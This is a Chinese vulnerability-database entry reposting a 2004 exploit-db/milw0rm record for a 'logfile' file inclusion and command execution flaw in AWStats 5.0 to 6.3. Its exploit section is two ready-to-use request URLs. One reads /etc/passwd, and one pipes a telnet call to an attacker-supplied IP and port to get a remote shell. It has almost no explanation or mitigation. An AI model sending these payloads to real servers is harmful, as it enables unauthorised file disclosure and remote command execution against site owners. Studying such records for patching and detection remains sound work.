AWStats 5.0 < 6.3 - 'logfile' File Inclusion / Command Execution admin 4年前发布 关注 私信 150 AWStats 5.0 < 6.3 – ‘logfile’ File Inclusion / Command Execution 漏洞ID 1054565 漏洞类型 发布时间 2004-08-21 更新时间 2004-08-21 CVE编号 N/A CNNVD-ID N/A 漏洞平台 CGI CVSS评分 N/A |漏洞来源 https://www.exploit-db.com/exploits/407 |漏洞详情 漏洞细节尚未披露 |漏洞EXP Example: http://[target]/awstats.pl?filterrawlog=&rawlog_maxlines=5000&config=stats.jdims.info&framename=main&pluginmode=rawlog&log file=/etc/passwd http://[target]/awstats.pl?filterrawlog=&rawlog_maxlines=5000&config=stats.jdims.info&framename=main&pluginmode=rawlog&logfile=&logfile=|telnet <your ip> <port> # milw0rm.com [2004-08-21] 相关推荐: WSMP3 Remote Information Disclosure Vulnerability WSMP3 Remote Information Disclosure Vulnerability 漏洞ID 1100283 漏洞类型 Input Validation Error 发布时间 2003-05-21 更新时间 2003-05-21 CVE编号 N… © 版权声明文章版权归作者所有,未经允许请勿转载。THE END网络安全漏洞# 漏洞# awstats喜欢就支持一下吧点赞0 分享收藏0